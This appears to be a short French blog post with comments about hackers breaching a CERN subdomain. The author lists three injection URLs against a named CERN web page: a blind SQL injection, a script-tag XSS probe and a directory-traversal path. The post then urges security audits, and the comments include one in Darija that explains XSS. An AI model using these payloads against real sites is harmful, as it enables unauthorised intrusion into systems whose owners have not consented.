Vous Avez peut être lu l’article des pirates grec qui se sont introduit dans un sous-domaine du CERN. Cela est d’autant plus intéressant puis que le CERN a dit que le hacker était de 1 à deux pas d’entrer dans le serveur du détecteurs de hadron .
Âpres quelque petit clics j ai trouver cela : le 3 en 1 des failles de sécurité sur le site LHC du Cern :
SQL Injection Aveugle
http://hcc.web.cern.ch/hcc/safety_subsec.php?safetysub=A45′ OR 1=1–
XSS
http://hcc.web.cern.ch/hcc/safety_subsec.php?safetysub=<script >alert(1)>/script>
Affichage du chemin du dossier virtuel
http://hcc.web.cern.ch/hcc/safety_subsec.php?safetysub=../../../../index.php
Pour tout grand projet IT ou non qui aurait des extension IT devrait subir une audit complete de securité car cela peut eviter la mise a mal de tout le projet .
Mets un petit Adsense dedans 😀
salut tt le monde
had shi dial le xss c’est cros site scripting o nas l3ianin homa li makaydirouch la protection des information entrant de plus ana nsaweb un script pl php une zone de text et une boutton ola ay haja proposé par qqu o lkan hass brasso 3wia9 yhackiha yallah